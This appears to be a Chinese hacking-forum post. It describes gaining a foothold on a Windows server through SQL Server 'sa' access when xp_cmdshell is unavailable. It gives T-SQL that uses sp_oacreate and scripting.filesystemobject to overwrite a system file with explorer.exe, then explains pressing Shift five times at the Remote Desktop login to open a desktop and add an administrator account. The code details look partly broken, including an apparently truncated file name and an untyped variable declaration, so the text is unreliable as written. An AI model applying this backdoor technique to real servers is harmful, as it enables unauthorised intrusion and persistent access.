xpcmdshell:sa  无xp_cmdshell下取权限又一简单思路方法

文章作者:charley008
信息来源:邪恶 8进制信息安全团队(Team)(www.eviloctal.com)

有了sa但无xp_cmdshell 如何恢复都提示出错好象是xxxx.cpp哪里哪里出错或者找不到指定模块反正我遇到好多次了在用exec sp_oacreate 'wscript.shell'也没办法情况下可用此思路方法
(很多服务器都把'wscript.shell'给删了)
看到既然能用sp_oacreatesp_oamethod来弄'wscript.shell'或者scripting.filesystemobject
网上看到文章都只有几个使用方法就是'wscript.shell'执行命令或者scripting.filesystemobject来写入木马或读取文件于是乎应该可以也能复制删除文件吧
上网找了些资料得到下面思路方法:
复制文件:

declare @o
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe' ,'c:\windows\system32\hc.exe';

declare @oo
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\hc.exe' ,'c:\windows\system32\dllcache\hc.exe';

成功后3389登陆按 5次sht键成功进入服务器直向上点”我电脑“右键“管理” 用户管理直接加用户
此法随无技术可言希望对某些人有点用

  • 篇文章: 再次突破雷客图ASP站长安全助手

  • 篇文章: 基于CallStackAnti-Rootkit HOOK检测思路
  • Tags:  spcmdshell xpcmdshell用法 cmdshell xpcmdshell

    延伸阅读

    最新评论

    发表评论